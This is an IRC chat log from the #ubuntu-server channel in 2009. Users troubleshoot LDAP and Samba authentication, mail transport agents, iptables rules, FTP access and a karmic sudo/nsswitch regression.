<Psi-Jack_> Sometime soon, I'm going to try to convince my employers to let me setup ldap, so we can add one user, once, instead of on EACH server.
<twb> Psi-Jack_: except if you need, say, squid to talk to LDAP securely :-(
<Psi-Jack_> No, I don't.
<Psi-Jack_> I just need it for system authentication primarily.
<Psi-Jack_> I'll be SURE to use it at my home network of ~20 systems, but at work, it'll be for about ~14 dedicated servers.
<twb> We have a *really* exciting way to update squid's digest password database, instead of setting up samba as a PDC purely to be a LDAP<-->squid bridge...
<Psi-Jack_> Samba inegration would be useful too. ;)
<Psi-Jack_> Both at home, and work, since we annoyingly have a few Windows servers coming in from a company we now own. ;)
<Sam-I-Am> my docs have samba too
<Sam-I-Am> and heimdal kerberos
<Sam-I-Am> its all there :)
<Psi-Jack_> Perfect.
<Psi-Jack_> That's the exact setup I wanted.
<Sam-I-Am> you'll need to tweak stuff for your needs...
<Psi-Jack_> Of course.
<Sam-I-Am> and i cant provide the exact ldifs
<Psi-Jack_> I know the ldap-migration tools stuff enough to generate the initial base structure.
<Sam-I-Am> i just start from scratch with a base ldif
<Sam-I-Am> keeps the junk out
<Sam-I-Am> bbiab..
<Psi-Jack_> Yeah.
<Psi-Jack_> I trim the fat, easily and quickly
<mathiaz> kirkland: https://wiki.ubuntu.com/ServerTeam/Membership
<uvirtbot> New bug: #422177 in nut (universe) "nut init isn't functional at all " [Undecided,New] https://launchpad.net/bugs/422177
<quantum> can anyone help me with a reverse DNS issue. client machines "nslookup" can't find server name address
<quantum> posted reverse DNS on http://pastebin.ca/1550498
<soren> quantum: What exactly are you trying? Can you post nslookup output?
<Sam-I-Am> hmm, i think sudo-ldap's binding to gnutls in karmic is bad.
 * mneptok arrives unclad like a radiant dawn
<Belloto> anyone knows howto change the bluetooth device name of my server from command line? (i.e. the name my telephone sees when searching for bluetooth devices) ... is there a way to change it NOT changing the computer host name?
<giovani> Belloto: you'll probably get better support in #ubuntu -- as bluetooth isn't a typical server service (and arguably shouldn't be)
<giovani> but a 2 second google returned the answer
<giovani> device { name "Your Name Here"; } in hcid.conf
<giovani> it seems you can also use %h and %d in there for hostname and deviceid, respectively
<Belloto> currently I see "ubuntu-0" as my server bluetooth name ... you mean I should change %h and %d by "Belloto", for example?
<giovani> Belloto: no, I mean you should do exactly what I wrote
<giovani> and %h and %d can be used inside of that string to expand -- this is all documented
<giovani> how is this #ubuntu-server related?
<Belloto> thanks giovani, can you pass me that url?
<giovani> there's no url
<giovani> please READ what I wrote here
<Belloto> "server related"? well, this is an image http server which is gonna send some photos by bluetooth to people passing nearby computer center
<giovani> bluetooth just isn't a server service ... but, fine -- I've done the research and provided the answer
<Belloto> images come from people that send them to server by bluetooth
<giovani> it's documented in the config
<giovani> so I'd recommend you read it
<guntbert> Belloto: it seems that the comment #local device name means just what you want, but it does'nt hurt to try anyway :-)
<Belloto> I was just asking what did your google search look like ... thats what I meant asking you for the url ... but dont wanna bother you, thanks man
<Belloto> of course I googled before entering her
<giovani> Belloto: my first (and only google search) was "bluetooth linux name"
<giovani> the very first result
<giovani> is a commented config file on gentoo's wiki
<giovani> explaining exactly how to do it
<giovani> the 2nd result is the manpage for the config
<giovani> and the 3rd is a blog post explaining how to do it again
<giovani> or rather, the 3rd is how to manually change your deviceid
<giovani> not the name
<firecrotch> !google | giovani
<ubottu> giovani: While Google is useful for helpers, many newer users don't have the google-fu yet. Please don't tell people to "google it" when they ask a question.
<giovani> firecrotch: I didn't, please don't forward incorrect information to me like that
<giovani> I provided him with the answer, and pointed him to the config
<giovani> he didn't seem happy with being handed the answer
<firecrotch> giovani: You're coming across as an elitist jackass though while doing it
<erewnoh> sorry to bother, but will ubuntu server be good to use as a proxy/file server for a home network?
<firecrotch> if that wasn't your intent, then I apologize
<giovani> firecrotch: I don't see how your opinion relates to sending me some notice about "telling users to google"
<erewnoh> I plan on streaming video to my PS3, about to return home from Iraq, angry to find out Hulu has blocked PS3
<giovani> when that clearly wasn't my first response -- I only went into detail about google after he explicitly asked about it
<giovani> erewnoh: an ubuntu server can definitely do all of that
<firecrotch> "I found it in 2 seconds with google"
<giovani> firecrotch: that's relevant, imo
<giovani> if it's a 10-minute google hunt, I'm not likely to mention it
<giovani> but it's insanely well documented
<erewnoh> sweet. I know this probably isn't the room, but could you go over hardware I'd need? plan on purchasing it all and having it sent home, want to make sure I buy the right things
<erewnoh> my internet is very slow otherwise I'd plug away on google. as it is, I'd rather rip my fingernails out
<giovani> erewnoh: hardware for what exactly?  I'm not sure what you're asking
<firecrotch> giovani: let's just drop it, this isn't really the place for this conversation, regardless
<erewnoh> for a home network / server setup
<giovani> erewnoh: I don't know what kind of answer you want ... I definitely can't build a server for you over irc
<giovani> nearly any hardware will do -- if you're looking to buy a computer to run linux, it's best to google around and make sure everything you'll be using is supported, but beyond that, there isn't a simple answer I (or anybody else) can provide on what to buy
<giovani> most people I know would use an old desktop you have laying around, or a friend's machine, etc
<erewnoh> no no, don't need the server built. the way I have it set up now is all my game consoles are behind a hub connected to my router. All computers connect directly to the router. can I just plug the server into the router and set all other systems to proxy through it or do I need more?
<giovani> erewnoh: you specifically want to proxy hulu traffic? I don't know what protocol hulu uses
<giovani> there shouldn't be any special hardware needed for the project -- but, the software side could be complex
<erewnoh> from what I read I just need to rip out the ps3 specific header? I want to proxy it all though, use as a firewall
<giovani> ok, a firewall and an application proxy aren't at all the same thing
<giovani> if it's an HTTP header, then you need an HTTP proxy
<giovani> if it's some weird video streaming protocol header, then you may or may not be able to find software to proxy it, and strip out that header
<giovani> you'd need to do some research on how exactly other people have done this (it sounds like you've already found some)
<erewnoh> ah, I must have read it wrong then, sorry to bother. Looked at squid and thought it could do all
<giovani> squid may very well be able to do it all
<giovani> I'm saying that I don't know what protocol hulu is using for their streaming -- so you should look into it
<erewnoh> i'll keep plugging away. appreciate the help, also nice to know don't need to spend a lot of money to get it set up
<erewnoh> will do, thanks giovani
<firecrotch> erewnoh: I believe that hulu uses the RTMP protocol
<erewnoh> googling
<erewnoh> I apologize, I'm very stupid about all this
<giovani> well the first question is -what- needs to be proxied/modified
<firecrotch> erewnoh: No need to apologize :)
<giovani> if only the HTTP requests need to be, then you don't need another proxy for a media protocol
<erewnoh> the website I read said the header just needs to be replaced
<erewnoh> so the ps3 looks like it is a desktop
<giovani> ok -- you need to find out what header they're talking about
<erewnoh> moment, pulling the site up
<erewnoh> the user agent string
<giovani> ok, again :)
<giovani> many protocols have user agent strings
<giovani> I know many media streaming protocols do, as does HTTP
<erewnoh> waiting for my bookmark to load, it had the specifics there
<erewnoh> http://tinyurl.com/l3s2hn
<giovani> ok, so, it's the HTTP header you're editing
<giovani> and they provide you will full instructions :)
<giovani> sounds like a good resource if you just want to do this
<erewnoh> yes, I was just more concerned about the server itself
<giovani> concerned about what, specifically?
<firecrotch> erewnoh: you won't need a very powerful machine to do that at all
<erewnoh> I can just plug it into my router, set it up, and won't need to buy a better switch or anything?
<giovani> nope
<giovani> nope to the better switch, that is
<erewnoh> main concern is someone from tigerdirect tried selling me on a thousand dollar server, a 75 dollar switch, so on
<giovani> especially if hulu doesn't use http for the media streaming
<giovani> erewnoh: no need for that at all
<erewnoh> alright, appreciate it. military doesn't pay all that way, look to save money where I can
<giovani> yeah, I'd definitely try this with an incredibly low-end box
<giovani> and see if it performs well enough
<giovani> i.e. grab some old desktop you almost ditched
<erewnoh> perfect. have an old hp desktop wasting space
<firecrotch> erewnoh: I would say that a pentium 3 or better would work
<erewnoh> i'm sure when I get home and think of other stuff to do I'll have more questions. really appreciate the help
<firecrotch> erewnoh: I'll most likely be around, if not here, in #ubuntu-offtopic, feel free to come find me later
<erewnoh> will do, thanks
<firecrotch> erewnoh: no problem :)
<mortuis99> i have used ubuntu desktop for a while and am wanting to try server.  what do i need to know?
<giovani> mortuis99: ... that it's for servers (or stripped-down desktops)
<giovani> it's the same operating system, with a different default set of packages from the ubuntu desktop install
<giovani> so, almost nothing is different, other than its target user base
<mortuis99> is it commandline or gui?
<mortuis99> i have a PIII machine and it can use 2 CPUs but has just one installed which version do i ise the 32 or 64 bbbbbbit?
<giovani> it doesn't provide a gui
<giovani> mortuis99: pentium 3s are 32-bit
<mortuis99> is it possible to run with a gui or is it commandline only?
<thowland> you can add a gui later, but if you're doing that you might as well install desktop
<giovani> mortuis99: if you install a gui, you're not going to be supported by #ubuntu-server -- it's definitely not recommended
<mortuis99> is their a guide to running it commandline?
<giovani> a guide to what, specifically?
<firecrotch> mortuis99: what purpose is this computer going to have that you're interested in installing Ubuntu Server Edition?
<mortuis99> alll i really wanna do is store data like movies and vids for in house use..  can i just use the desktop version?
<giovani> mortuis99: you can do that from a desktop, yes
<firecrotch> mortuis99: You can certainly use the desktop version for that
<firecrotch> mortuis99: for someone who is relatively new to the whole thing, which I assume you are, it may be more efficient for you to use the desktop version
<mortuis99> kewl thanks again to the UBUNTU community for the great help :-)
<Psi-Jack_> Wow.
<Psi-Jack_> Google's having issues.
<giovani> noticed that too?
<firecrotch> Psi-Jack_: What kind of issues?
<Psi-Jack_> Heh.
<Psi-Jack_> gmail's completely down.
<giovani> yep
<Psi-Jack_> Someone typed google in google!
<mathiaz> ahasenack: hey - if the bzr package branches for smartpm exists, I'd recommend to use them
<Psi-Jack_> Their IMAP works fine, but not their web interface.
<mathiaz> ahasenack: otherwise just add a debdiff
<ahasenack> mathiaz: I have no idea if they exist. I didn't find them in free's code.launchpad.net listing
<ahasenack> mathiaz: and I don't know how to generate a debdiff, is a "diff -uNr old/ new/" enough?
<mathiaz> ahasenack: https://code.launchpad.net/ubuntu/+source/smart
<mathiaz> ahasenack: ^^ doesn't show any packaging branches
<mathiaz> ahasenack: https://wiki.ubuntu.com/PackagingGuide/Recipes/Debdiff
<mathiaz> ahasenack: ^^ will walk you through preparing a debdiff
<ahasenack> mathiaz: thanks
<mortuis99> the motheboard in the server can support up to 8 ultra ATA HDs with 9.04 have any problems with that?
<giovani> mortuis99: nope ... but that's very rare -- 8 UATA driveS?
<mortuis99> yeah has 4 connector slots
<giovani> ok
<giovani> presuming the controller is supported by linux, sure
<mortuis99> THAT is the question
<guntbert> mortuis99: not a "server answer" but you can of course try it out with the live CD
<mortuis99> ok
<giovani> mortuis99: no, the question you asked was if ubuntu would support 8 UATA HDs
<giovani> mortuis99: we can't help figure out if your server's controller is supported without more information
<mortuis99> lemme gee MOBO manual
<mortuis99> the mobo is the ABIT VP6
<mortuis99> im not sure the controller that is on the mobo
<giovani> neither am I
<giovani> I suggest you research a bit on it
<giovani> should be relatively easy to find
<mortuis99> i thin it is the Ultra DMA 100/RAID
<mortuis99> High Point HPT370 IDE Controller
<Psi-Jack_> Well now. gmail is /still/ down.
<Psi-Jack_> That's very long for anything google to be down!
<giovani> Psi-Jack_: their emergency outage page shows that they won't have an ETA for an hour
<giovani> imap is up though
<giovani> everyone smart uses imap
<Psi-Jack_> Yep. I know, IMAP's working.
<Psi-Jack_> But, all our CSR team is supposed to be using the web interface, at most. LOL
<Psi-Jack_> IMAP usage, since we're not QoSing right now, was choking the office bandwidth. ;)
<giovani> you're using gmail for corporate stuff?
<giovani> ouch
<Psi-Jack_> Yes. Yes. I /know/ and I've warned them repeatedly, it's NOT a good idea. EVER. ;)
<giovani> what industry is the company in?
<Psi-Jack_> They think it's too much work to administer their own mail servers, and I'm like, Dude.. You got me. I can do it in seconds.
<Psi-Jack_> giovani, SaaS. :)
<giovani> what kind of software then?
<Psi-Jack_> We deal with hotelier channel management, yielding rates to expedia, travelocity, orbitz, etc.
<giovani> ah
<giovani> well if you're in SaaS, I guess you use SaaS eh? :)
<Psi-Jack_> Heh, apparently so!
<giovani> drank a little too much of the koolaid
<Psi-Jack_> LOL
<ahasenack> mathiaz: my case is a bit more complicated than that wiki page about debdiff unfortunately
<ahasenack> it goes nuts apparently
<Sam-I-Am> ahasenack: remember my problem from this morning?
<ahasenack> debdiff intrepid/smart_1.2-0ubuntu1.8.10.1.dsc landscape/smart_1.2-0ubuntu1.9.04.1.dsc
<ahasenack> I get even the wrong order in the diff lines
<ahasenack> Sam-I-Am: yeah, what was it?
<Sam-I-Am> well, i configured a jaunty box same way... works fine
<Sam-I-Am> so its definitely a karmic problem
<ahasenack> and it invents a "smart.orig" directory that I don't have
<ahasenack> Sam-I-Am: ok, would be cool if you could pinpoint it
<Sam-I-Am> also found out another problem... sudo w/ ldap won't connect with TLS
<Sam-I-Am> which smells like another gnutls problem
<ahasenack> Sam-I-Am: yeah, I was just about to say that
<ahasenack> gnutls--
<Sam-I-Am> so thats another issue i need to look into
<ahasenack> what's the point of having a better license if it doesn't work
<Sam-I-Am> however, thats not the problem with su/sudo getting those weird messages
<Sam-I-Am> so now that i've eliminated some stuff i'm going to drill down... also curious if it affects karmic server
<ahasenack> the openldap maintainer already said gnutls was just bad to work and develop with
<Sam-I-Am> ita awful
<Sam-I-Am> its
<Sam-I-Am> i came across a critical functionality bug about a month ago that was only recently fixed... with a patch provided in the report.
<Sam-I-Am> howard chu from openldap is who got the ball rolling and it didn't seem to speed things up
<ahasenack> if you get too many problems with tls, you might be better off rebuilding it yourself with openssl
<ahasenack> but that can bring library hell down upon you
<mathiaz> Sam-I-Am: at least try to report the bug to upstream (openldap or gnutls)
<mathiaz> Sam-I-Am: we can't go back to openssl - so better debug/improve the gnutls support
<Sam-I-Am> mathiaz: yeah, licensing sucks :/
<Sam-I-Am> openssl is clearly a better product
<mathiaz> ahasenack: seems like you managed to fix your debdiff problem?
<ahasenack> mathiaz: not really
<Sam-I-Am> i'm going to install karmic server now... try to find the same bug w/ gnutls... then try a version compiled against openssl.
<ahasenack> mathiaz: I have two source packages, I downloaded them and fed the .dsc files to debdiff
<ahasenack> mathiaz: the output is insane
<mathiaz> Sam-I-Am: may be. But we respect everyone licensing choice.
<ahasenack> mathiaz: the one I attached was easier, as the difference between jaunty and landscape-branch is small
<ahasenack> but the rest...
<ahasenack> intrepid, I mean
<Sam-I-Am> the other issue is those weird errors... what i CAN say is that as soon as i put 'ldap' for passwd in /etc/nsswitch.conf, it breaks.  soon as i change it back to 'files' or 'compat' its fine.
<ahasenack> I have no idea how to give you a diff
<ahasenack> Sam-I-Am: I wouldn't use "compat"
<Sam-I-Am> well, even files works
<mathiaz> ahasenack: is this because there is a new upstream version?
<ahasenack> Sam-I-Am: brings back some vague recollections about issues
<Sam-I-Am> putting 'ldap' anywhere gives those issues
<Sam-I-Am> nsswitch.conf is part of base-files iirc...
<mathiaz> ahasenack: have you build the source package correctly?
<ahasenack> Sam-I-Am: initgroups() is something that springs to mind as not bothering with the order in there
<mathiaz> ahasenack: what about the size of the diff.gz?
<Sam-I-Am> thats kinda like the error i was getting...
<ahasenack> mathiaz: I downloaded both sources with dget
<ahasenack> mathiaz: no need to build, right? It's already built
<mathiaz> ahasenack: agreed.
<ahasenack> mathiaz: ran this: ebdiff intrepid/smart_1.2-0ubuntu1.8.10.1.dsc landscape/smart_1.2-0ubuntu1.9.04.1.dsc
<mathiaz> ahasenack: I'm onto something else right now
<ahasenack> mathiaz: the simpler diff -uNr intrepid/smart-1.2 landscape/smart-1.2 generates a much more comprehensible output
<mathiaz> ahasenack: I'll get back to you later if I can
<ahasenack> mathiaz: np, I'm off for the day
<mathiaz> ahasenack: try to ask in #ubuntu-motu or #ubuntu-devel
<Sam-I-Am> hopefully i'll have this narrowed down by tomorrow...
<ahasenack> Sam-I-Am: did you try the suid root ls trick?
<Sam-I-Am> ls worked fine
<Sam-I-Am> its just su/sudo best i can tell
<ahasenack> well, good luck
<ahasenack> seems to be well inside the system
<Sam-I-Am> yeah :/
<ahasenack> cya
<Sam-I-Am> thx
<smoser> soren, http://www.zlib.net/pigz/ and http://compression.ca/pbzip2/
<lamont> ScottK: HTH did it get to be a 1.3MB package, I wonder?  (amd64)
<soren> smoser: $ apt-cache search pigz
<soren> pigz - Parallel Implementation of GZip
<soren> [2009-09-01 17:20:44] soren@ralph:~/src/eucalyptus$
<soren> \o/
<soren> Go for it :)
<soren> smoser: Oh. Do you think it'll be able to extract to stdout?
<soren> smoser: Oh, the description also suggests that it's only for compression.
<smoser> yeah.. .i sweare there was one for uncompression though..
<smoser> and htis does (as you thought) write extra metadata
#ubuntu-server 2009-09-02
<Psi-Jack> My gawd, how long can it take to make a Raid5 array of only 3 drives? heh
<Psi-Jack> Playing with FreeNAS, and made it build a Raid5 softraid just to see how it works.
<ScottK> lamont: No idea.
<slangasek> are there UEC images available yet that are candidates for inclusion in alpha 5?
<wfiuewfew> Hi---does ubuntu server 9.04 come pre-configured with a firewall, or do I need to configure one manually
<Damm> is there a good question to ping about Ubuntu Karmic Kernels missing the virtio stuff?
<Damm> guess i'll boot into a known working version of the kernel
<Damm> and file a bug
<twb> "IvAin Arce, Pablo HernAin Jorge, Alejandro Pablo Rodriguez, MartAÂ­n Coco, Alberto SoliAto Testa and Pablo Annetta discovered that Dnsmasq [...]"
<twb> Someone forget to use UTF-8?
<twb> (From USN 827-1)
<MTeck> I was wondering how I could get rid of these errors. They're starting to get annoying. http://paste.ubuntu.com/263520/
<twb> MTeck: where are those messages appearing, and what is generating them?
<twb> Seems like you're using exim4
<ScottK> Some of them are exim generated.
<ScottK> If the logs are annoying use logwatch and don't read logs directly.
<twb> logwatch is awesome
<MTeck> That's logwatch I though
<jmarsden> MTeck: Or you could ask about what causes them in #exim
<twb> Probably this channel is just postfix fanboys
<MTeck> yup - that one's logwatch
<MTeck> I like the guys in this channel
<MTeck> it's in the #ubuntu space
<ScottK> Exim4 probably ships with a logwatch file that has a regex in it for the exim logs.
<ScottK> You'd need to tune that to get rid of more exim stuff.
<MTeck> It's not them being there that bothers me - it's why they're there
<MTeck> no mail should come into this system
<ScottK> twb: Actually one of the two people primarily responsible for exim4 beingin Main in Ubuntu is in this channel.
<twb> Oh sorry, I meant logcheck.
<twb> logwatch is for people who enjoy unknown log entries being silently ignored instead of red-flagged
<jmarsden> There is some message or other trying to go OUT of your system that isn't making it, I think... but someone in #exim should have a better idea about that than I do.
<ScottK> So it's not all Postfix fans.
<twb> ScottK: ah, I didn't know it WAS in main :-)
<MTeck> I use logwatch and logcheck
<MTeck> check is nightly and watch is weekly
<MTeck> so - how would I make exim only listen locally on 25?
<twb> MTeck: surely that's the default?
<ScottK> Well you'd needone of the exim people for that.
<ScottK> twb: Not likely.
<ScottK> MTA should listen on port 25.  That's what they do.
<MTeck> so I need iptables?
<twb> ScottK: I was just thinking in general Debian packages avoid listening to the world by default
<ScottK> twb: Not MTA packages.
<twb> Fair enough
<ScottK> Accepting mail and listening on the port are two different things.
<ScottK> For example, the postfix package listens on port 25, but won't accept mail for any domain without configuration.
<MTeck> I just want the system to send email without being a butt head about it
<jmarsden> MTeck: Then use ssmtp not exim4 :)    BTW to reconfigure what interfaces exim4 listens on, do  sudo dpkg-reconfigure exim4-config
<twb> I have had bad experiences with ssmtp and nullmailer.
<twb> I currently use msmtp, and it has worked MUCH better for me.
<ScottK> iptables is another option.
<twb> ScottK: that's kinda a bludgeon-into-submission approach, though
<ScottK> Sure.
<jmarsden> twb: Did you file bugs against ssmtp and nullmailer, so the issues can be addressed?
<twb> jmarsden: I can't remember, this was a long time ago
<MTeck> jmarsden: ok - almost done w/ homework and I'll try out msmtp - will web applications automatically use it instead? that's where most of the mail comes from
<jmarsden> OK.  I've not had issues with it, so I was going to check uo on them.
<twb> The problem was ssmtp IIRC was some kind of assumption about a hostname and mailname matching, because somehow bounce messages were ending up on twb@<my ISP> because my local username was twb, though my email address was not-twb@<my ISP>
<twb> ...or something like that.
<twb> The problem with nullmailer was more along the lines of panic messages getting stuck in its queue, on machines that nobody looked at for months, so nobody noticed they had exploded.
<twb> I like that msmtp doesn't have a local queue -- it will simply not exit until the remote end has either accepted the message for relay, or told it to FOAD
<jmarsden> MTeck: If they open port localhost 25, your web apps will use any working MTA.  If they exec a sendmail program, you may have a little configuring to do.
<twb> Anything Provides: mail-transport-agent should have a standard /usr/sbin/sendmail interface...
<MTeck> It's php so I'll hope it'll just work
<twb> haha
<giovani> php will use a sendmail app
<giovani> so "just work" not so much
<giovani> unless you have a drop-in sendmail replacement
<MTeck> oh
<twb> Debian Policy requires MTA packages to provide a drop-in sendmail replacement!
<jmarsden> dpkg -L msmtp | grep sendmail does not seem to reveal a /usr/bin/sendmail being installed... it is described as an SMTP client, not an MTA.
<jmarsden> That is why I think some configuration might be needed if you pick msmtp, which is what MTeck said he was about to try out.
<twb> jmarsden: msmtp-mta is a separate package
<twb> It just symlinks /usr/sbin/sendmail to /usr/bin/msmtp
<twb> I think the recent versions also use debconf to autogenerate /etc/msmtprc.
<twb> Having said all that, msmtp is certainly for light deployments, not for e.g. a 256-user shell server.
<uvirtbot> New bug: #415587 in mysql-dfsg-5.1 "Mythbuntu installation broken after dist-upgrade" [Undecided,New] https://launchpad.net/bugs/415587
<lamont> ScottK: -2 uploaded to debian, btw
<uvirtbot> New bug: #422968 in bind9 (main) "bind9 fails to start and update" [Undecided,New] https://launchpad.net/bugs/422968
<ScottK> lamont: OK.  My upload saved having to deal with Launchpad once, so I'd call it a win.
<lamont> heh - yeah, no worries
<lamont> bug 422968 is proof that maintainers kind of assume that you won't completely stray from their stock config.  sigh
<uvirtbot> Launchpad bug 422968 in bind9 "bind9 fails to start and update" [Undecided,New] https://launchpad.net/bugs/422968
<twb> Yay for dnsmasq
<lamont> twb: you're pegging the sarcasm meter here...
<twb> HHOS
<lamont> ??
<twb> !google HHOS site:catb.org
<ubottu> Error: I am only a bot, please don't think I'm intelligent :)
<lamont> heh
<jmarsden> http://catb.org/jargon/html/H/ha-ha-only-serious.html
<MTeck> So... any reason dd would be running on my server?
<MTeck> a server that is only a virtual machine (linode)
<MTeck> that was just kind of alarming..
<MTeck> klogd is taking up 100% cpu too....
<MTeck> sleep - time - please hilight me with any answers and I'll catch up when the sun comes up.
<MTeck> thanks
<henkjan> MTeck: http://fixunix.com/ubuntu/551193-why-there-dd-process-running-daemon.html
<twb> I remember sending esr a grumble email when his domain changed without warning from tuxfoo.net to catb.org
<twb> That's going back a way
<un|matrix> hi... how do i block an IP address with iptables on a router?
<jmarsden> How did you set up the current set of iptables rules on that same router?
<jmarsden> Basically you create a rule to match that IP as a source address and drop traffic that matches it.  Then you add it to whatever config file your current routing setup uses.  There are too many variables to give you a "cut and paste" answer.
<un|matrix> i've tried iptables -A OUTPUT -d $address -j DROP
<un|matrix> but this only bans it on the actual router
<un|matrix> the nat clients can still ping it
<jmarsden> Sounds like you added it to the wrong table?
<un|matrix> filter?
<un|matrix> where should i add it to? mangle?
<jmarsden> Probably FORWARD.  Read the docs/tutorials on iptables and you'll find diagrams explaining what each table is for.  Such as at http://iptables-tutorial.frozentux.net/chunkyhtml/c962.html
<un|matrix> i'm also dropping it in both directions in FORWARD, but it can still be pinged
<un|matrix> is the rule order important?
<jmarsden> Yes.
<un|matrix> so if i have a rule that lets everything through
<un|matrix> and add a rule that bans a certain thing after it
<un|matrix> would it still get thru?
<un|matrix> damn
<un|matrix> yeah
<un|matrix> that was it
<jmarsden> Yes.
<un|matrix> x_x
<un|matrix> well thank you very much, these few basic details were missing in my iptables knowledge
<jmarsden> No problem.
<uvirtbot> New bug: #412972 in openssh (main) "bad signal mask of ssh sessions" [Medium,Confirmed] https://launchpad.net/bugs/412972
<MTeck> henkjan: thanks
<Kjartan2> Hello, I'm having issues with my pure-ftpd-server. I have created users and can access them from the machine itself. But I cannot access them from any other machine. I can however access the apache server from any machine. Any tips?
<bunny> does anyone know what partitioning utilities are available from the "execute a shell" environment of the server install cd?
<Kjartan2> fdisk?
<bunny> !bugs
<ubottu> If you find a bug in Ubuntu or any of its derivatives, please file a bug using the command Â« ubuntu-bug <package> Â» If that fails, you can report bugs manually at https://bugs.launchpad.net/ubuntu/+filebug - Bugs in/wishes for the bots can be filed at http://bugs.launchpad.net/ubuntu-bots
<Kjartan2> Hello, I'm having issues with my pure-ftpd-server. I have created users and can access them from the machine itself. But I cannot access them from any other machine. I can however access the apache server from any machine. Any tips? My first time setting up a text-only server.
<MTeck> Kjartan2: did you check logs?
<Kjartan2> in /var/log/pure-ftpd/transfer.log? That log is empty
<MTeck> Kjartan2: Can other systems get to the server at all?
<MTeck> Enable ufw without allowing the two ports for ftp?
<Kjartan2> As said, I can access the webserver fine. Perhaps it's apparmor if that's installed be default.
<Kjartan2> Trying to learn this all at once. ^^
<Boohbah> Kjartan2: is the ftp server listening on a public IP? check with netstat
<jdstrand> there is no default apparmor protection for pure-ftpd-server. Please see https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/AppArmorProfiles
<jdstrand> so there is no need to change apparmor
<Kjartan2> Oh, I don't have to mess with apparmor?
<Kjartan2> Boohbah: There's nothing with pure-ftpd in netstat
<Kjartan2> Only connection open is to here, freenode.
<Boohbah> really, even with netstat -anp ?
<jdstrand> Kjartan2: I'm just saying that apparmor isn't getting in the way of pure-ftpd unless you specifically added an apparmor profile for it
<Boohbah> sorry i should have specified flags, netstat won't show all connections by default
<Twink> What's the best solution for getting nagios3 installed on 8.04?  Is it to download/compile from source, use a debian source, or any other way?
<Kjartan2> jdstrand: Ah ok, so since there is no DENY it's default ALLOW?
<Kjartan2> Boohbah: *:21 is on listen
<MadCoder_> Hi! Could anyone help me with freenx setup?
<MadCoder_> if any... I need to use client's com-port
<Twink> MadCoder_: Don't ask to ask, just ask ;)
<jdstrand> Kjartan2: apparmor usage in Ubuntu application specific. if a profile is not defined for a binary, the binary is unconfined.
<Boohbah> Twink: i would install from source... no need to worry about breaking your apt db :)
<MadCoder_> How to use COM1 on client from freenx session?
<Twink> Boohbah: From nagios source?
<Twink> Boohbah: Thanks - I'll do that, and sorry for my dumb reply just a second ago!
<jdstrand> sommer: hi! I added a couple of features to ufw that you may want to add the server guide for 9.10
<jdstrand> sommer: a) filtering by interface, b) egress filtering and c) the ufw-framework.8 man page
<jdstrand> sommer: as always, it is in the man page and I'm available for questions/feedback :)
<uvirtbot> New bug: #423071 in php5 (main) "PHP5 now depends on libapache2-mod-php5 even if lighttpd installed" [Wishlist,Confirmed] https://launchpad.net/bugs/423071
<sommer> jdstrand: thanks that's awesome... I'll hopefully be able to get to that today or tomorrow
<jdstrand> sommer: thanks! :)
<VSpike> Is there a way to install saned on ubuntu server without pulling in the whole of xorg?
<Sam-I-Am> hey folks...
<Sam-I-Am> got an interesting issue with karmic
<Sam-I-Am> (and it affects server)
<Sam-I-Am> as soon as i change nsswitch.conf to use ldap for passwd, su and sudo break
<Sam-I-Am> as in, unusable.
<VSpike> aha - install sane-utils, not sane
<Sam-I-Am> brought this up yesterday as something i found in karmic desktop, but its apparent in server too
<alvin> VSpike: indeed
<Sam-I-Am> mathiaz: you around?
<smoser> mathiaz, https://bugs.launchpad.net/ubuntu/karmic/+bugs?field.milestone=12713
<mathiaz> Sam-I-Am: hey
<Sam-I-Am> mathiaz: got a problem i'd like to run by you before filing a bug... maybe its some policy thing i'm missing in karmic.
<mathiaz> Sam-I-Am: sure - go ahead
<Sam-I-Am> mathiaz: as soon as i change the 'passwd' field in nsswitch.conf to point to ldap, sudo and su quit working completely.
<Sam-I-Am> sudo returns 'sudo: setreuid(ROOT_UID, user_uid): operation not permitted" and su returns "setgid: operation not permitted"
<Sam-I-Am> returning the system to files only fixes the problem
<mathiaz> Sam-I-Am: was it working on jaunty?
<Sam-I-Am> if i havent already enabled root to get back into the system, its competely hosed
<Sam-I-Am> yes, works fine
<Sam-I-Am> verified that yesterday
<mathiaz> Sam-I-Am: seems like a regression then
<Sam-I-Am> i cant even figure out whats breaking... its a system call of some sort thats getting blocked... figured it might be some sort of new policy thing maybe.
<Sam-I-Am> like apparmor, only worse.
<Sam-I-Am> what package would i post this bug with?
<Sam-I-Am> since it seems to be more of a core problem
<Sam-I-Am> seems 'ldap files' does not work but 'files ldap' does
<mathiaz> Sam-I-Am: seems like an issue with the nss system - libc then?
<orudie> question. i followed this tutorial to set up mail filters for postfix/dovecot https://help.ubuntu.com/8.10/serverguide/C/mail-filtering.html and it had been working find for almost a year. However ClamAV seem to use a lot of memory, so I was wondering if it is wise to uninstall it , and how should i actually go about safely uninstalling it
<Sam-I-Am> mathiaz: yeah... nsswitch.conf is part of base-files
<Sam-I-Am> hard to say whats going on here
<Sam-I-Am> it seems rather grave at any rate
<VSpike> alvin: have you used saned?  I'm just trying to figure out, if I set up xinetd to use saned, do I also need to edit /etc/default/saned to start saned?
<alvin> VSpike: yes, a long time ago. It worked, but I don't remember using xinetd. Take a look here: https://help.ubuntu.com/community/ScanningHowTo There is a section about setting up a scanner server in Ubuntu 9.04
<mathiaz> Sam-I-Am: even though nsswitch.conf is part of base-file, it's the libc package that takes care of the nss subsystem (IIRC)
<Sam-I-Am> mathiaz: yeah, i'll file against glibc
<Sam-I-Am> mathiaz: another problem... sudo-ldap in karmic doesn't work with TLS.  looks like another gnutls problem.
<orudie> is there a way for me to somehow be connected to irc from screen , but use windows client like xchat to connect to my screen then irc?
<Sam-I-Am> its not a 'main' package, but its definitely something people use... should probably become part of 'main' someday
<Sam-I-Am> orudie: screen doesnt do gui stuff
<Sam-I-Am> it'd be cool if there was a way to 'screen' x11 stuff...
<alvin> Sam-I-Am: you can try Quassel
<orudie> Sam-I-Am-> what about screen proxy ?
<VSpike> It seems a bit odd that the package doesn't add the saned user to the scanner group
<mathiaz> Sam-I-Am: right - we've discussed sudo-ldap - IIRC it should just be merged with sudo
<mathiaz> Sam-I-Am: there isn't any reason to have two packages IIRC
<Sam-I-Am> yeah
<mathiaz> Sam-I-Am: but I would double-check this
<alvin> orudie: Oops, that message was for you. (Quassel can do that)
<Sam-I-Am> i think its actually libldap doing the tls connection, not sudo itself... going to try my openssl-bound libldap packages, see what happens.  i'm guessing this is YAGB :)
